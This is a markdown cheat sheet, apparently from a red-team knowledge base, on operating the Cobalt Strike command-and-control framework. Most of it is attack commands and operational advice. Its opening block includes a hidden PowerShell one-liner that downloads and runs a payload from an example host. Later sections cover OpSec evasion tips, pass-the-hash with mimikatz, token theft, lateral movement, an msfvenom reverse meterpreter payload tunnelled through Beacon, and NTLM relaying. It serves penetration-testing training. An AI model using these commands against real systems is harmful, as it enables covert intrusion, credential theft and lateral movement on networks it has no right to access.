cobalt-strike.md (13439B)
1 --- 2 title: "Cobalt Strike" 3 section: "Command & Control" 4 sectionSlug: "command-control" 5 sourcePath: "docs/command-control/cobalt-strike.md" 6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/command-control/cobalt-strike.md" 7 sha: "203bb0c0b290" 8 isIndex: false 9 --- 10 11 # Cobalt Strike 12 13 > Cobalt Strike is threat emulation software. Red teams and penetration testers use Cobalt Strike to demonstrate the risk of a breach and evaluate mature security programs. Cobalt Strike exploits network vulnerabilities, launches spear phishing campaigns, hosts web drive-by attacks, and generates malware infected files from a powerful graphical user interface that encourages collaboration and reports all activity. 14 15 ```powershell 16 sudo apt-get update 17 sudo apt-get install openjdk-11-jdk 18 sudo apt install proxychains socat 19 sudo update-java-alternatives -s java-1.11.0-openjdk-amd64 20 sudo ./teamserver 10.10.10.10 "password" [malleable C2 profile] 21 ./cobaltstrike 22 powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://campaigns.example.com/download/dnsback'))" 23 ``` 24 25 ## Summary 26 27 * [Infrastructure](#infrastructure) 28 * [Redirectors](#redirectors) 29 * [Domain fronting](#domain-fronting) 30 * [OpSec](#opsec) 31 * [Customer ID](#customer-id) 32 * [Malleable C2](#malleable-c2) 33 * [Files](#files) 34 * [Powershell and .NET](#powershell-and-net) 35 * [Powershell commabds](#powershell-commands) 36 * [.NET remote execution](#net-remote-execution) 37 * [Lateral Movement](#lateral-movement) 38 * [VPN & Pivots](#vpn--pivots) 39 * [Beacon Object Files](#beacon-object-files) 40 * [NTLM Relaying via Cobalt Strike](#ntlm-relaying-via-cobalt-strike) 41 * [References](#references) 42 43 ## Infrastructure 44 45 ### Redirectors 46 47 ```powershell 48 sudo apt install socat 49 socat TCP4-LISTEN:80,fork TCP4:[TEAM SERVER]:80 50 ``` 51 52 ### Domain Fronting 53 54 * New Listener > HTTP Host Header 55 * Choose a domain in "Finance & Healthcare" sector 56 57 ## OpSec 58 59 **Don't** 60 61 * Use default self-signed HTTPS certificate 62 * Use default port (50050) 63 * Use 0.0.0.0 DNS response 64 * Metasploit compatibility, ask for a payload : `wget -U "Internet Explorer" http://127.0.0.1/vl6D` 65 66 **Do** 67 68 * Use a redirector (Apache, CDN, ...) 69 * Firewall to only accept HTTP/S from the redirectors 70 * Firewall 50050 and access via SSH tunnel 71 * Edit default HTTP 404 page and Content type: text/plain 72 * No staging `set hosts_stage` to `false` in Malleable C2 73 * Use Malleable Profile to taylor your attack to specific actors 74 75 ### Customer ID 76 77 > The Customer ID is a 4-byte number associated with a Cobalt Strike license key. Cobalt Strike 3.9 and later embed this information into the payload stagers and stages generated by Cobalt Strike. 78 79 * The Customer ID value is the last 4-bytes of a Cobalt Strike payload stager in Cobalt Strike 3.9 and later. 80 * The trial has a Customer ID value of 0. 81 * Cobalt Strike does not use the Customer ID value in its network traffic or other parts of the tool 82 83 ## Malleable C2 84 85 List of Malleable Profiles hosted on Github 86 87 * Cobalt Strike - Malleable C2 Profiles [xx0hcd/Malleable-C2-Profiles](https://github.com/xx0hcd/Malleable-C2-Profiles) 88 * Cobalt Strike Malleable C2 Design and Reference Guide [threatexpress/malleable-c2](https://github.com/threatexpress/malleable-c2) 89 * Malleable-C2-Profiles [rsmudge/Malleable-C2-Profiles](https://github.com/rsmudge/Malleable-C2-Profiles) 90 * SourcePoint is a C2 profile generator [Tylous/SourcePoint](https://github.com/Tylous/SourcePoint) 91 92 Example of syntax 93 94 ```powershell 95 set useragent "SOME AGENT"; # GOOD 96 set useragent 'SOME AGENT'; # BAD 97 prepend "This is an example;"; 98 99 # Escape Double quotes 100 append "here is \"some\" stuff"; 101 # Escape Backslashes 102 append "more \\ stuff"; 103 # Some special characters do not need escaping 104 prepend "!@#$%^&*()"; 105 ``` 106 107 Check a profile with `./c2lint`. 108 109 * A result of 0 is returned if c2lint completes with no errors 110 * A result of 1 is returned if c2lint completes with only warnings 111 * A result of 2 is returned if c2lint completes with only errors 112 * A result of 3 is returned if c2lint completes with both errors and warning 113 114 ## Files 115 116 ```powershell 117 # List the file on the specified directory 118 beacon > ls <C:\Path> 119 120 # Change into the specified working directory 121 beacon > cd [directory] 122 123 # Delete a file\folder 124 beacon > rm [file\folder] 125 126 # File copy 127 beacon > cp [src] [dest] 128 129 # Download a file from the path on the Beacon host 130 beacon > download [C:\filePath] 131 132 # Lists downloads in progress 133 beacon > downloads 134 135 # Cancel a download currently in progress 136 beacon > cancel [*file*] 137 138 # Upload a file from the attacker to the current Beacon host 139 beacon > upload [/path/to/file] 140 ``` 141 142 ## Powershell and .NET 143 144 ### Powershell commands 145 146 ```powershell 147 # Import a Powershell .ps1 script from the control server and save it in memory in Beacon 148 beacon > powershell-import [/path/to/script.ps1] 149 150 # Setup a local TCP server bound to localhost and download the script imported from above using powershell.exe. Then the specified function and any arguments are executed and output is returned. 151 beacon > powershell [commandlet][arguments] 152 153 # Launch the given function using Unmanaged Powershell, which does not start powershell.exe. The program used is set by spawnto 154 beacon > powerpick [commandlet] [argument] 155 156 # Inject Unmanaged Powershell into a specific process and execute the specified command. This is useful for long-running Powershell jobs 157 beacon > psinject [pid][arch] [commandlet] [arguments] 158 ``` 159 160 ### .NET remote execution 161 162 Run a local .NET executable as a Beacon post-exploitation job. 163 164 Require: 165 166 * Binaries compiled with the "Any CPU" configuration. 167 168 ```powershell 169 beacon > execute-assembly [/path/to/script.exe] [arguments] 170 beacon > execute-assembly /home/audit/Rubeus.exe 171 [*] Tasked beacon to run .NET program: Rubeus.exe 172 [+] host called home, sent: 318507 bytes 173 [+] received output: 174 175 ______ _ 176 (_____ \ | | 177 _____) )_ _| |__ _____ _ _ ___ 178 | __ /| | | | _ \| ___ | | | |/___) 179 | | \ \| |_| | |_) ) ____| |_| |___ | 180 |_| |_|____/|____/|_____)____/(___/ 181 182 v1.4.2 183 ``` 184 185 ## Lateral Movement 186 187 :warning: OPSEC Advice: Use the **spawnto** command to change the process Beacon will launch for its post-exploitation jobs. The default is rundll32.exe 188 189 * **portscan:** Performs a portscan on a specific target. 190 * **runas:** A wrapper of runas.exe, using credentials you can run a command as another user. 191 * **pth:** By providing a username and a NTLM hash you can perform a Pass The Hash attack and inject a TGT on the current process. \ 192 :exclamation: This module needs Administrator privileges. 193 * **steal_token:** Steal a token from a specified process. 194 * **make_token:** By providing credentials you can create an impersonation token into the current process and execute commands from the context of the impersonated user. 195 * **jump:** Provides easy and quick way to move lateraly using winrm or psexec to spawn a new beacon session on a target. \ 196 :exclamation: The **jump** module will use the current delegation/impersonation token to authenticate on the remote target. \ 197 :muscle: We can combine the **jump** module with the **make_token** or **pth** module for a quick "jump" to another target on the network. 198 * **remote-exec:** Execute a command on a remote target using psexec, winrm or wmi. \ 199 :exclamation: The **remote-exec** module will use the current delegation/impersonation token to authenticate on the remote target. 200 * **ssh/ssh-key:** Authenticate using ssh with password or private key. Works for both linux and windows hosts. 201 202 :warning: All the commands launch powershell.exe 203 204 ```powershell 205 Beacon Remote Exploits 206 ====================== 207 jump [module] [target] [listener] 208 209 psexec x86 Use a service to run a Service EXE artifact 210 psexec64 x64 Use a service to run a Service EXE artifact 211 psexec_psh x86 Use a service to run a PowerShell one-liner 212 winrm x86 Run a PowerShell script via WinRM 213 winrm64 x64 Run a PowerShell script via WinRM 214 215 Beacon Remote Execute Methods 216 ============================= 217 remote-exec [module] [target] [command] 218 219 Methods Description 220 ------- ----------- 221 psexec Remote execute via Service Control Manager 222 winrm Remote execute via WinRM (PowerShell) 223 wmi Remote execute via WMI (PowerShell) 224 225 ``` 226 227 Opsec safe Pass-the-Hash: 228 229 1. `mimikatz sekurlsa::pth /user:xxx /domain:xxx /ntlm:xxxx /run:"powershell -w hidden"` 230 2. `steal_token PID` 231 232 ### Assume Control of Artifact 233 234 * Use `link` to connect to SMB Beacon 235 * Use `connect` to connect to TCP Beacon 236 237 ## VPN & Pivots 238 239 :warning: Covert VPN doesn't work with W10, and requires Administrator access to deploy. 240 241 > Use socks 8080 to setup a SOCKS4a proxy server on port 8080 (or any other port you choose). This will setup a SOCKS proxy server to tunnel traffic through Beacon. Beacon's sleep time adds latency to any traffic you tunnel through it. Use sleep 0 to make Beacon check-in several times a second. 242 243 ```powershell 244 # Start a SOCKS server on the given port on your teamserver, tunneling traffic through the specified Beacon. Set the teamserver/port configuration in /etc/proxychains.conf for easy usage. 245 beacon > socks [PORT] 246 beacon > socks [port] 247 beacon > socks [port] [socks4] 248 beacon > socks [port] [socks5] 249 beacon > socks [port] [socks5] [enableNoAuth|disableNoAuth] [user] [password] 250 beacon > socks [port] [socks5] [enableNoAuth|disableNoAuth] [user] [password] [enableLogging|disableLogging] 251 252 # Proxy browser traffic through a specified Internet Explorer process. 253 beacon > browserpivot [pid] [x86|x64] 254 255 # Bind to the specified port on the Beacon host, and forward any incoming connections to the forwarded host and port. 256 beacon > rportfwd [bind port] [forward host] [forward port] 257 258 # spunnel : Spawn an agent and create a reverse port forward tunnel to its controller. ~= rportfwd + shspawn. 259 msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f raw -o /tmp/msf.bin 260 beacon> spunnel x64 184.105.181.155 4444 C:\Payloads\msf.bin 261 262 # spunnel_local: Spawn an agent and create a reverse port forward, tunnelled through your Cobalt Strike client, to its controller 263 # then you can handle the connect back on your MSF multi handler 264 beacon> spunnel_local x64 127.0.0.1 4444 C:\Payloads\msf.bin 265 ``` 266 267 ## Beacon Object Files 268 269 > A BOF is just a block of position-independent code that receives pointers to some Beacon internal APIs 270 271 Example: <https://github.com/Cobalt-Strike/bof_template/blob/main/beacon.h> 272 273 * Compile 274 275 ```ps1 276 # To compile this with Visual Studio: 277 cl.exe /c /GS- hello.c /Fohello.o 278 279 # To compile this with x86 MinGW: 280 i686-w64-mingw32-gcc -c hello.c -o hello.o 281 282 # To compile this with x64 MinGW: 283 x86_64-w64-mingw32-gcc -c hello.c -o hello.o 284 ``` 285 286 * Execute: `inline-execute /path/to/hello.o` 287 288 ## NTLM Relaying via Cobalt Strike 289 290 ```powershell 291 beacon> socks 1080 292 kali> proxychains python3 /usr/local/bin/ntlmrelayx.py -t smb://<IP_TARGET> 293 beacon> rportfwd_local 8445 <IP_KALI> 445 294 beacon> upload C:\Tools\PortBender\WinDivert64.sys 295 beacon> PortBender redirect 445 8445 296 ``` 297 298 ## References 299 300 * [Red Team Ops with Cobalt Strike (1 of 9): Operations](https://www.youtube.com/watch?v=q7VQeK533zI) 301 * [Red Team Ops with Cobalt Strike (2 of 9): Infrastructure](https://www.youtube.com/watch?v=5gwEMocFkc0) 302 * [Red Team Ops with Cobalt Strike (3 of 9): C2](https://www.youtube.com/watch?v=Z8n9bIPAIao) 303 * [Red Team Ops with Cobalt Strike (4 of 9): Weaponization](https://www.youtube.com/watch?v=H0_CKdwbMRk) 304 * [Red Team Ops with Cobalt Strike (5 of 9): Initial Access](https://www.youtube.com/watch?v=bYt85zm4YT8) 305 * [Red Team Ops with Cobalt Strike (6 of 9): Post Exploitation](https://www.youtube.com/watch?v=Pb6yvcB2aYw) 306 * [Red Team Ops with Cobalt Strike (7 of 9): Privilege Escalation](https://www.youtube.com/watch?v=lzwwVwmG0io) 307 * [Red Team Ops with Cobalt Strike (8 of 9): Lateral Movement](https://www.youtube.com/watch?v=QF_6zFLmLn0) 308 * [Red Team Ops with Cobalt Strike (9 of 9): Pivoting](https://www.youtube.com/watch?v=sP1HgUu7duU&list=PL9HO6M_MU2nfQ4kHSCzAQMqxQxH47d1no&index=10&t=0s) 309 * [A Deep Dive into Cobalt Strike Malleable C2 - Joe Vest - Sep 5, 2018](https://posts.specterops.io/a-deep-dive-into-cobalt-strike-malleable-c2-6660e33b0e0b) 310 * [Cobalt Strike. Walkthrough for Red Teamers - Neil Lines - 15 Apr 2019](https://www.pentestpartners.com/security-blog/cobalt-strike-walkthrough-for-red-teamers/) 311 * [TALES OF A RED TEAMER: HOW TO SETUP A C2 INFRASTRUCTURE FOR COBALT STRIKE – UB 2018 - NOV 25 2018](https://holdmybeersecurity.com/2018/11/25/tales-of-a-red-teamer-how-to-setup-a-c2-infrastructure-for-cobalt-strike-ub-2018/) 312 * [Cobalt Strike - DNS Beacon](https://www.cobaltstrike.com/help-dns-beacon) 313 * [How to Write Malleable C2 Profiles for Cobalt Strike - January 24, 2017](https://bluescreenofjeff.com/2017-01-24-how-to-write-malleable-c2-profiles-for-cobalt-strike/) 314 * [NTLM Relaying via Cobalt Strike - July 29, 2021 - Rasta Mouse](https://rastamouse.me/ntlm-relaying-via-cobalt-strike/) 315 * [Cobalt Strike - User Guide](https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/welcome_main.htm) 316 * [Cobalt Strike 4.6 - User Guide PDF](https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-6-user-guide.pdf)